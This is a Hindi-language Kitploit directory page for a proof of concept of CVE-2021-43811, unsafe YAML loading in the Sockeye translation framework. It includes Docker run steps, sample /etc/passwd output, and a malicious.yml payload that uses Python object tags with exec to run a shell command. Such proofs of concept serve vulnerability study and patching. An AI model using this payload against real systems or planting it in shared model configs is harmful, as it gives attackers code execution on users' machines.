Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-43811 — awslabs/sockeye असुरक्षित YAML लोडिंग द्वारा कोड इंजेक्शन CVE-2021-43811 | Kitploit
उपकरण/GitHubGitHub/s-index/cve-2021-43811
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणपेपर और शोधलर्निंग और शिक्षा
GitHubs-index/cve-2021-43811

CVE-2021-43811

awslabs/sockeye असुरक्षित YAML लोडिंग द्वारा कोड इंजेक्शन CVE-2021-43811

रिपॉजिटरी देखें
224 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-43811

awslabs/sockeye असुरक्षित YAML लोडिंग के माध्यम से कोड इंजेक्शन CVE-2021-43811

NVD विवरण

Sockeye एक ओपन-सोर्स सीक्वेंस-टू-सीक्वेंस फ्रेमवर्क है जो PyTorch पर निर्मित न्यूरल मशीन अनुवाद के लिए है। Sockeye मॉडल और डेटा कॉन्फ़िगरेशन को डिस्क पर संग्रहीत करने के लिए YAML का उपयोग करता है। 2.3.24 से नीचे के संस्करण असुरक्षित YAML लोडिंग का उपयोग करते हैं, जिसे कॉन्फ़िग फ़ाइलों में एम्बेडेड मनमाना कोड निष्पादित करने के लिए बनाया जा सकता है। एक हमलावर प्रशिक्षित मॉडल की कॉन्फ़िग फ़ाइल में दुर्भावनापूर्ण कोड जोड़ सकता है और उपयोगकर्ताओं को इसे डाउनलोड और चलाने के लिए राजी करने का प्रयास कर सकता है। यदि उपयोगकर्ता मॉडल चलाते हैं, तो एम्बेडेड कोड स्थानीय रूप से चलेगा। यह समस्या संस्करण 2.3.24 में ठीक की गई है।

डेमो

cve-2021-43811

सेटअप

  1. Dockerfile से एक इमेज बनाएं
root@kitploit:~
docker build -t cve-2021-43811 .
  1. एक नए कंटेनर में python main.py चलाएं
root@kitploit:~
docker run -it --rm cve-2021-43811

आउटपुट /etc/passwd

root@kitploit:~
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

आउटपुट-छवि

PoC पेलोड

malicious.yml

root@kitploit:~
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"

संदर्भ

  • https://github.com/awslabs/sockeye/security/advisories/GHSA-ggmr-44cv-24pm
टूल डाउनलोड करें